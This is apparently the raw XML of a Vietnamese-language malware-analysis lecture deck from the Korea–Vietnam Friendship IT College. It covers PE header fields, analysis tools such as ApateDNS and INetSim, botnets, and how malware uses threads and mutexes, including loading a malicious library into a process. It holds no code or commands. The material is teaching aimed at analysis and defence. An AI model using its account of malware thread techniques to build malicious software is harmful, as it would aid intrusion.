              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> etc. The last 128 bytes contains the Data Directory which is an array of 16 IMAGE_DATA_DIRECTORY structures.</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173838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Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> i386,486,586 (0x14c)</a:t>
            </a:r>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118797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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595306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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="504425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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1132811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03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1947386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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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26001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004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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337880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004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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2397214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24744"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="8229600" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3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CC004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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414962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004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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50623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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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329476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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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3583090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C004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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401228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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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396786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004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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180102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004B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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39032E-7B51-4E15-9222-EB0F43ABC83B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1037908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04B57-344B-4127-95E0-C4D70C1DB92C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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39032E-7B51-4E15-9222-EB0F43ABC83B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3027438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fireeye.com/services/freeware/apatedns.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www.inetsim.org/"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virustota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file:///\\ServerName\share"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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dr.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Tran The Son</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Korea – Vietnam Friendship IT College</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953715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Botnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>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3" y="1196752"/>
            <a:ext cx="9063360" cy="5283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009929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err="1" smtClean="0"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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132856"/>
            <a:ext cx="5534397" cy="4692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65984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err="1" smtClean="0"/>
              <a:t>Mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>viện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Lắng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nghe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 socket/pipe -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Đọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> socket/pipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27337400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err="1"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nhằm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> chia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sẽ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nguyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>hữu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ở 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>thời</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
